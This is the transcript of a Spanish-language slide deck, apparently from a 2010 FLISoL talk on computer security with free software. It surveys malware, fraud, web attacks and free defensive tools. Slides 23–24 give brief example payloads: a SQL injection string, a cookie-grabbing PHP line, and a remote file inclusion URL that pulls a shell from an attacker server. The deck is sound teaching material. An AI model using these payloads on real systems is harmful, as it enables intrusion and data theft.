seguridad informatica con software libre
DESCRIPTION
Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".TRANSCRIPT
![Page 1: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/1.jpg)
Seguridad Informatica con Software Libre
Juan Alfredo Salas Santillana
![Page 2: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/2.jpg)
AGENDA
¿Seguridad Informatica?
Nivel Usuario
- Tipos de Amenazas - Algunos Numeros
- Medidas Basicas a Tomar
Nivel Administrador, Desarrollador – Servidores
- Tipos de Ataques - Factores Fisicos y Otros
- Medidas Basicas a Tomar - Como Ocultarte
Algunas Demostraciones
Ethical Hacking
Recomendaciones
![Page 3: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/3.jpg)
¿Seguridad Informatica?
Integridad
Confidencialidad
Disponibilidad
No Repudio
![Page 4: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/4.jpg)
Tipos de Amenazas
Malware
Fraudes
![Page 5: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/5.jpg)
Amenazas: Malware
VirusKeyloggersTroyanosGusanosSpywareRootkits
![Page 6: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/6.jpg)
Malware: Virus
Destruccion
Replicación mediante usuario
![Page 7: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/7.jpg)
Malware: Keyloggers
Capturan:
-Pulsación de Teclas
-Clicks del Mouse
![Page 8: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/8.jpg)
Malware: Troyanos
Era un Metodo de Infección
Procesos Ocultos
Administración Remota
Se Juntan con Aplicaciones Utiles
![Page 9: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/9.jpg)
Malware: Gusanos
Autoreplicacion
Autopropagación
Aprobechan bugs
![Page 10: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/10.jpg)
Malware: Spyware
Recolectan:
Cache, Contraseñas
Usualmente son barras
![Page 11: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/11.jpg)
Malware: Rootkits
- Consiguen: Privilegios
- Permiten Correr Programas como Root (Administrador)
![Page 12: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/12.jpg)
Amenaza: Fraude
Phishing
Phraming
Skimming
Ingenieria Social Como Tal
![Page 13: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/13.jpg)
Fraude: Phishing
Pesca Victimas
Robar Información
Por: Email (SPAM)
![Page 14: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/14.jpg)
Fraude: Pharming
Envia a una Pagina falsa
Modifica:
”Hosts”
”Cache de DNS”
![Page 15: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/15.jpg)
Fraude: Skimming
Clonación de Tarjetas
Mediante Cajeros
![Page 16: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/16.jpg)
Fraude: Ingenieria Social
Usar la Palabra para convencer
Principios: A Todo nos Gusta que nos Alagen
No nos Gusta Decir ”NO”
Siempre un Gesto de Confianza
![Page 17: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/17.jpg)
Medidas Basicas
Antivirus
Firewall
Filtro AntiSpam
![Page 18: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/18.jpg)
Medidas Basicas: Antivirus
CLAMAV
- Plataforma: Windows- Licencia: GPL- Monitoreo Permanente- Actualizaciones Frecuentes- No Consume Mucha Memoria
Dr. Web (Livecd)
- Plataforma: GNU / Linux- Licencia: GPL- Modo: Booteo- Analiza fuera de Windows
![Page 19: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/19.jpg)
Medidas Basicas: Firewall
Aislamiento
Registro de Uso
Reglas de Transmision
![Page 20: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/20.jpg)
Algunos Numeros
Virus Indetectable: $100 - $300
Cuenta de Correo Robado: $10 - $100
Tarjeta de Credito Robada: $1000
![Page 21: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/21.jpg)
Tipos de Ataques
DOS
Mediante Web
Explotación de bugs
![Page 22: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/22.jpg)
Ataques: DOS
Tratan de Colapsar un Servicio
Algunos Abren Gran Cantidad de sockets
Algunos Realizados Desde una ”Netbot”
![Page 23: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/23.jpg)
Ataques: Mediante Web
Inyeccion SQL
Filtrado Incorrecto de Variables
Ejemplo: '' OR '1'='1'
XSS
Filtrado Incorrecto de Etiquetas
No Afecta en si al Servidor, Solo al Usuario
Ejemplo: $cookie = $_GET[\'cookie\'];
![Page 24: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/24.jpg)
Ataques: Mediante Web
CSRF
Explota la Confianza de la Aplicacion a un Usuario
RFI
Explotable por la mala programacion de ”Include()”Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls
![Page 25: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/25.jpg)
Ataques: Explotacion de Bugs
Usan Vulnerabilidades conocidas
Se corre un script
Puede ser Relizado por un Aprendiz
![Page 26: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/26.jpg)
Medidas Basicas
Firewall
Test de Penetración
Filtrado de Variables
![Page 27: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/27.jpg)
Medidas Basicas: Firewall
IPTABLES
Incluido en el Kernel Linux
Registro de Logs
FIRESTARTER
Licencia: GPL
Facil manejo y configuración
![Page 28: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/28.jpg)
Medidas Basicas: Test de Pentración
NMAP
Escaner de puertos, SO y mas.
Licencia: GPL
METASPLOIT F.
Framework que permite explotar vulnerabilidades.
NESSUS
Escaner de vulnerabilidades
![Page 29: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/29.jpg)
Medidas Basicas: Filtrado de Variables
![Page 30: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/30.jpg)
Factores Fisicos y Otros
Incendios
Inundaciones
Robo Fisico
Defectos y Daños de Hardware
![Page 31: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/31.jpg)
Como Ocultarte
Tor
![Page 32: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/32.jpg)
Algunas Demostraciones
![Page 33: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/33.jpg)
Ethical Hacking
Pasion
Libertad
Conciencia Social
"Ningún problema debería resolverse 2 veces"
![Page 34: Seguridad informatica Con Software Libre](https://reader033.vdocuments.co/reader033/viewer/2022052602/559e28f21a28abe27b8b463e/html5/thumbnails/34.jpg)
Recomendaciones
Nada es 100% Seguro
Filtrar tu Informacion
Encripta tu Informacion
Revisa tus Logs
Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo